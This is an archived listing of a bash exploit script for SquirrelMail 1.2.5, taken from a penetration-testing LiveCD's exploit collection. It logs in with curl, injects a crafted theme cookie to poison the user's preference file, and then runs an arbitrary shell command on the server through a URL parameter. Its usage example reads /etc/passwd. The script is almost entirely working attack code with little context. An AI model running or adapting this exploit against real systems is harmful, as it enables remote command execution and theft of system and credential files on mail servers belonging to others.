home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / squirrelmail / sq125x < prev    next >
Text File  |  2005-02-12  |  2KB  |  61 lines

  1. #!/bin/bash
  2. #
  3. # squirrelmail-1.2.5 remote execution by pokleyzz
  4. http://www.inetd-secure.net
  5. #
  6. # usage   : ./sq125x themecount username password
  7. url command
  8. # example : ./sq125x 2 pokley 123456
  9. http://mail.pokleyzz.my/mail "cat /etc/passwd"
  10. #
  11. # curl can be found at http://curl.haxx.se/libcurl/
  12. #
  13.  
  14. export
  15. PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l
  16. ocal/sbin"
  17. export CURL="/usr/bin/curl"
  18. export USERNAME="$2"
  19. export PASSWORD="$3"
  20. export THEME_COUNT="$1"
  21. export URL="$4"
  22. export COMMAND=`echo $5|sed 's/\ /%20/g' -`
  23. export TMPFILE="header.tmp"
  24. export THEME="theme[${THEME_COUNT}][PATH]
  25. =../data/${USERNAME}.pref; theme
  26. [${THEME_COUNT}][NAME]=testing"
  27.  
  28. #step 1
  29. sed "s/pokley/"$USERNAME"/g" post.txt >lame.txt
  30. /bin/rm -rf ${TMPFILE}
  31. $CURL -b "$THEME" -d
  32. login_username=${USERNAME} -d
  33. secretkey=${PASSWORD} -d
  34. js_autodetect_results=0 -d just_logged_in=1 -D
  35. ${TMPFILE} ${URL}/src/redirect.php
  36. export COOKIES=`cat ${TMPFILE} |grep Set-
  37. Cookie|awk {'print $2'}|while read data;do printf '%b'
  38. $data;done`
  39. export COOKIES="${COOKIES} ${THEME}"
  40. $CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
  41. silent ${URL}/src/options.php
  42.  
  43. #step 2
  44. sleep 5s
  45. $CURL -b "$THEME" -d
  46. login_username=${USERNAME} -d
  47. secretkey=${PASSWORD} -d
  48. js_autodetect_results=0 -d just_logged_in=1 -D
  49. ${TMPFILE} ${URL}/src/redirect.php
  50. export COOKIES=`cat ${TMPFILE} |grep Set-
  51. Cookie|awk {'print $2'}|while read data;do printf '%b'
  52. $data;done`
  53. export COOKIES="${COOKIES} ${THEME}"
  54. $CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
  55. silent ${URL}/src/options.php
  56. $CURL -b "$COOKIES" ${URL}/src/left_main.php?
  57. cmdd=${COMMAND}
  58. $CURL -b "$COOKIES" -o /tmp/.tmp --silent
  59. ${URL}/src/signout.php
  60. rm -rf lame.txt /tmp/.tmp
  61.